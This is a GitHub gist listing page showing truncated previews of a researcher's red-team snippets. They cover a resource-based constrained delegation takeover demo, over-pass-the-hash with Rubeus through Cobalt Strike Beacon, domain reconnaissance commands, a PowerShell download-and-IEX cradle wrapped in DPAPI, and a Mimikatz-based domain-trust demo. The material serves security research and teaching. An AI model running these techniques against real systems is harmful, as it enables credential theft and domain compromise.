Skip to content

Instantly share code, notes, and snippets.

geeking out about Kerberos

Will HarmJ0y

geeking out about Kerberos
Block or report user

Report or block HarmJ0y

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
HarmJ0y / rbcd_demo.ps1
Last active Mar 13, 2020
Resource-based constrained delegation computer DACL takeover demo
View rbcd_demo.ps1
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"
HarmJ0y / gist:dc379107cfb4aa7ef5c3ecbac0133a02
Last active Mar 20, 2020
Over-pass-the-hash with Rubeus and Beacon
View gist:dc379107cfb4aa7ef5c3ecbac0133a02
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
HarmJ0y / cobaltstrike_sa.txt
Created Sep 28, 2018
Cobalt Strike Situational Awareness Commands
View cobaltstrike_sa.txt
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
HarmJ0y / New-SYSVOLZip.ps1
Created Aug 8, 2017
Compresses all of SYSVOL to a local .zip file.
View New-SYSVOLZip.ps1
function New-SYSVOLZip {
Compresses all folders/files in SYSVOL to a .zip file.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
View DPAPI.ps1
Add-Type -AssemblyName System.Security
$Content = (New-Object Net.Webclient).DownloadString('')
$Bytes = ([Text.Encoding]::ASCII).GetBytes($Content)
$EncryptedBytes = [Security.Cryptography.ProtectedData]::Protect($Bytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)
IEX (([Text.Encoding]::ASCII).GetString([Security.Cryptography.ProtectedData]::Unprotect($EncryptedBytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine)))
HarmJ0y / PowerView-3.0-tricks.ps1
Last active Apr 3, 2020
PowerView-3.0 tips and tricks
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
View Get-NonstandardService.ps1
function Get-NonstandardService {
Returns services where the associated binaries are either not signed, or are
signed by an issuer not matching 'Microsoft'.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
View powershell_talks.txt
BSides LV 2015 - "Building an Empire with PowerShell" -
BSides DC 2015 - "Bridging the Gap: Lessons in Adversarial Tradecraft" -
BSides DC 2015 - "** It, Do it Live (PowerShell Digital Forensics)" -
PowerShell Summit 2016 - "Digital Forensics with PowerShell" -
BSides LV 2016 - "Building an EmPyre with Python" -
DerbyCon 2016 - "A Year in the Empire" -
HarmJ0y / ConvertFrom-UserParameter.ps1
Last active Sep 16, 2019
View ConvertFrom-UserParameter.ps1
function ConvertFrom-UserParameter {
Converts a userparameters encoded blob into an ordered dictionary of decoded values.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
HarmJ0y / 44con_demo.ps1
Created Sep 17, 2016
Demo for the 44con "Trusts You Might Have Missed" presentation
View 44con_demo.ps1
# import PowerView and Invoke-Mimikatz
Import-Module .\powerview.ps1
Import-Module .\mimikatz.ps1
# map all reachable domain trusts
# enumerate groups with 'foreign' users users, and convert the foreign principal SIDs to names
Find-ForeignGroup -Domain external.local
Find-ForeignGroup -Domain external.local | Select-Object -ExpandProperty UserName | Convert-SidToName
You can’t perform that action at this time.